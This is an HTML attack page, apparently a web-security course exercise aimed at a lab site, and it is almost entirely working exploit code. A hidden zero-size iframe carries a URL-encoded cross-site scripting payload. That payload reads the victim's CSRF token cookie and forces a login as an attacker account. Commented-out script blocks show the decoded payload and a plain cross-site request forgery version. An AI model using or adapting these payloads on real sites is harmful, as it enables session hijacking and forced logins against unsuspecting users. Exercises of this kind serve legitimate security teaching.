<!--<script>
    var url = 'https://webproject.gtinfosec.org/login?csrfdefense=1&xssdefense=4';
    var username = 'attacker';
    var password = 'l33th4x';

    var form_data = new FormData();
    form_data.append('username', username);
    form_data.append('password', password);

    fetch(url, {method: 'POST', body: form_data, credentials: 'include'})
</script> -->

<iframe src="https://webproject.gtinfosec.org/search?q=%3Cscript%3E+++++window.onload+%3D+function%28%29%7B+++++var+username+%3D+%27attacker%27%3B+++++var+password+%3D+%27l33th4x%27%3B+++++var+cookie+%3D+document.cookie.split%28%22%3B+%22%29.find%28%28element%29+%3D%3E+element.startsWith%28%22csrf_token%3D%22%29%29.split%28%22%3D%22%29%5B1%5D%3B+++++console.log%28cookie%29%3B++++++var+form_data+%3D+new+FormData%28%29%3B+++++form_data.append%28%27username%27%2C+username%29%3B+++++form_data.append%28%27password%27%2C+password%29%3B+++++form_data.append%28%27csrf_token%27%2C+cookie%29%3B++++++url+%3D+%22https%3A%2F%2Fwebproject.gtinfosec.org%2Flogin%3Fcsrfdefense%3D1%26xssdefense%3D0%22%3B++++++fetch%28url%2C+%7Bmethod%3A+%27POST%27%2C+body%3A+form_data%2C+credentials%3A+%27include%27%7D%29%3B+++++%7D+%3C%2Fscript%3E" width="0" height="0" frameborder="0"></iframe>




<!-- <script>
    window.onload = function(){
    var username = 'attacker';
    var password = 'l33th4x';
    var cookie = document.cookie.split("; ").find((element) => element.startsWith("csrf_token=")).split("=")[1];
    console.log(cookie);

    var form_data = new FormData();
    form_data.append('username', username);
    form_data.append('password', password);
    form_data.append('csrf_token', cookie);

    url = "https://webproject.gtinfosec.org/login?csrfdefense=1&xssdefense=0";

    fetch(url, {method: 'POST', body: form_data, credentials: 'include'});
    } </script>
 -->
